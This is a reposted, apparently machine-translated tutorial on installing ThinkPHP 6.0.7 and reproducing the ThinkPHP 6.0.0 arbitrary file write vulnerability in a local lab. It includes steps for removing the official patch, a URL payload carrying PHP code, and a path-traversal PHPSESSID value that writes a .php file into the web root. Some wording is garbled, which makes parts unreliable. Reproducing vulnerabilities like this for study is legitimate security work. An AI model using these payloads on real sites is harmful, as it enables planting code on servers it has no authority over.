Shulou(Shulou.com)05/31 Report--

This article introduces you how to install tinkphp6.0.7 and thinkphp6.0.0 arbitrary file write vulnerability reproduction, the content is very detailed, interested friends can refer to, I hope to help you.

tinkphp6.0.7 installation I. First prepare the environment phpstudy7.1.13 II. Then prepare the Composer installer and install it to the phpstudy7.1.13 path

This path is random.

This path will allow

After entering the command line, execute the command to install

composer create-project topthink/think tp

After downloading, move the tp folder to the folder you are accustomed to accessing

configuration information

modify configuration file

/tp/config #

The last one was wrong.

app_namespace true changed to flase

Verification of parameter information

tp6.0.0 arbitrary file write vulnerability recurrence: first, download the source code

composer create-project topthink/think tp 6.0.0

Then move to the directory you want to put on the website

Visit: 127.0.0.1:8086/cms2021/tp/public/

Found successful installation:

Version 6.0.0

php think run Run development environment

II. Deploying vulnerability environments

Vulnerability file location:

\tp\vendor\topthink\framework\src\think\session\Store.php

Points to note:

1. Remove official patch-->ctype_alnum function

Remove the patch on line 121

after the abstraction of

32 characters,

UA header or cookie information

Step 2: Add an option

\tp\app\controller\index.php Add

use think\facade\Session; //session$test=request()->only(['a ']); //write Session::set("test",$test ['a']) in index method; //write in index method

Note the location of the addition

3. Step 3: Open the accept seeion session

tp\app\middleware.php Open session info

\think\middleware\SessionInit::class

III. Recurrence of loopholes

http://127.0.0.1/tp/public/index.php? a=%3C? php%20phpinfo();?% 3E

If we execute this one, we will find no echo, we can go to his website root directory to check

\tp\runtime\session

Found it coming in serialized form.

IV. Capturing packages, modifying sessions, writing sessions to the root directory of the website

PHPSESSID=../../../../ 123456789chongxqweq.php File to write

Note: If PHPSESSID needs to satisfy 32 characters, if the upload is unsuccessful, then delete and delete until the upload is successful.

verification

About how to install tinkphp6.0.7 and thinkphp6.0.0 arbitrary file write vulnerability reproduction to share here, I hope the above content can have some help for everyone, you can learn more knowledge. If you think the article is good, you can share it so that more people can see it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.